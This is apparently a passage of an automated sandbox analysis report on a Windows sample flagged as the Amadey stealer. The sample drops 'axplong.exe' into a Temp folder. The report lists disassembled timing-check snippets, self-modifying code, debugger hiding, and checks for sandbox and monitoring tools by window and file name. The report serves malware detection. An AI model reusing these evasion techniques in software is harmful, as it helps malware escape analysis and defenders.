Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C46 second address: 4F40C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA955157A01h 0x0000000a and eax, 2B32E3E6h 0x00000010 jmp 00007FA955157A01h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA9551579FDh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C87 second address: 4F40D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA954E703D7h 0x00000009 add cl, FFFFFFCEh 0x0000000c jmp 00007FA954E703D9h 0x00000011 popfd 0x00000012 mov ch, E9h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FA954E703D9h 0x00000020 or ax, 26B6h 0x00000025 jmp 00007FA954E703D1h 0x0000002a popfd 0x0000002b mov edi, esi 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov edi, 76C3514Ah 0x00000037 mov ebx, 526D3816h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40D0A second address: 4F40D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0DB2 second address: 4FB0DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0DBC second address: 4FB0DF3 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007FA9551579FEh 0x0000000f mov bh, ch 0x00000011 pop ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA955157A02h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0DF3 second address: 4FB0E4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA954E703D1h 0x00000009 add ch, FFFFFF96h 0x0000000c jmp 00007FA954E703D1h 0x00000011 popfd 0x00000012 jmp 00007FA954E703D0h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FA954E703D7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB022D second address: 4FB0266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA955157A07h 0x00000009 jmp 00007FA955157A03h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0266 second address: 4FB027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB027D second address: 4FB02B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA955157A08h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB02B9 second address: 4FB02C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB02C8 second address: 4FB02CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB02CE second address: 4FB02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0025 second address: 4FB0078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0DB83EA2h 0x00000008 call 00007FA955157A03h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 mov di, si 0x00000016 pushfd 0x00000017 jmp 00007FA955157A00h 0x0000001c sub esi, 7FE39A68h 0x00000022 jmp 00007FA9551579FBh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov dx, 79D6h 0x00000031 mov dl, 5Dh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB0078 second address: 4FB007E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB007E second address: 4FB0082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50012 second address: 4F50036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FA954E703CBh 0x00000012 pop eax 0x00000013 mov di, FDDCh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50036 second address: 4F5005D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA9551579FEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5005D second address: 4F500A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FA954E703D7h 0x0000000b or ecx, 34CBDF6Eh 0x00000011 jmp 00007FA954E703D9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F500A4 second address: 4F500A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F500A8 second address: 4F500AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F500AC second address: 4F500B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F500B2 second address: 4F50106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA954E703D0h 0x00000008 mov esi, 1F3DB871h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 call 00007FA954E703CAh 0x00000018 pushfd 0x00000019 jmp 00007FA954E703D2h 0x0000001e sub cx, 9078h 0x00000023 jmp 00007FA954E703CBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c mov ebx, 683BDE9Ah 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB04D3 second address: 4FB04F1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7D9ABBCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA955157A01h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB04F1 second address: 4FB04F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB04F7 second address: 4FB04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FB04FB second address: 4FB052B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA954E703D4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6045C second address: 4F6048E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA955157A04h 0x0000000c and ah, 00000048h 0x0000000f jmp 00007FA9551579FBh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6048E second address: 4F60492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60492 second address: 4F60498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60498 second address: 4F604E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FA954E703CDh 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007FA954E703D1h 0x0000001a xor eax, 4EBEA3C6h 0x00000020 jmp 00007FA954E703D1h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60684 second address: 4F606E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA955157A07h 0x00000009 or esi, 08D0861Eh 0x0000000f jmp 00007FA955157A09h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 1Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007FA955157A09h 0x00000025 pop esi 0x00000026 push edx 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F606E7 second address: 4F6070F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA954E703D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6070F second address: 4F607D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 call 00007FA955157A00h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 mov esi, edi 0x00000014 pop ebx 0x00000015 pushfd 0x00000016 jmp 00007FA955157A06h 0x0000001b xor esi, 518D7268h 0x00000021 jmp 00007FA9551579FBh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 jmp 00007FA955157A06h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA9551579FEh 0x00000036 jmp 00007FA955157A05h 0x0000003b popfd 0x0000003c mov ecx, 6E155727h 0x00000041 popad 0x00000042 push eax 0x00000043 jmp 00007FA9551579FDh 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a mov dx, si 0x0000004d call 00007FA955157A08h 0x00000052 mov edx, eax 0x00000054 pop esi 0x00000055 popad 0x00000056 push esp 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F607D2 second address: 4F60805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA954E703D5h 0x0000000a or ecx, 3549B756h 0x00000010 jmp 00007FA954E703D1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F60805 second address: 4F6080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 2EEA88 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4B86E7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 519747 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: D4EA88 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F186E7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F79747 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04FB09F8 rdtsc

0_2_04FB09F8

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 368	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 561	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1862	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 554	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3760	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2056	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1608	Thread sleep count: 368 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1608	Thread sleep time: -736368s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1068	Thread sleep count: 578 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1068	Thread sleep time: -1156578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3548	Thread sleep count: 333 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3548	Thread sleep time: -9990000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6616	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5440	Thread sleep count: 561 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5440	Thread sleep time: -1122561s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2916	Thread sleep count: 1862 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2916	Thread sleep time: -3725862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5888	Thread sleep count: 554 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5888	Thread sleep time: -1108554s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2916	Thread sleep count: 3760 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2916	Thread sleep time: -7523760s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 0000000A.00000002.4177987870.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;
Source: axplong.exe, 00000001.00000002.4188372534.0000000001743000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4188372534.0000000001701000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1794333755.0000000000468000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1849953616.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2368735525.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000008.00000002.2979205128.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.3570874379.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 0000000A.00000002.4177987870.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04FB08CB Start: 04FB0A76 End: 04FB0905

0_2_04FB08CB

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04FB09F8 rdtsc

0_2_04FB09F8

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D1645B mov eax, dword ptr fs:[00000030h]		1_2_00D1645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 1_2_00D1A1C2 mov eax, dword ptr fs:[00000030h]		1_2_00D1A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 0000000A.00000002.4177987870.0000000000EC8000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: :Program Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 1_2_00CFD312 cpuid

1_2_00CFD312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 1_2_00CFCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

1_2_00CFCB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 10.2.axplong.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.axplong.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.axplong.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.axplong.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1806644631.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1849863375.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1753740859.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2368636814.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2934260432.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.3527716082.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2978601103.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.4135878691.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2328198252.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4177804471.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3570626421.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1809437017.0000000005250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1794273100.0000000000281000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

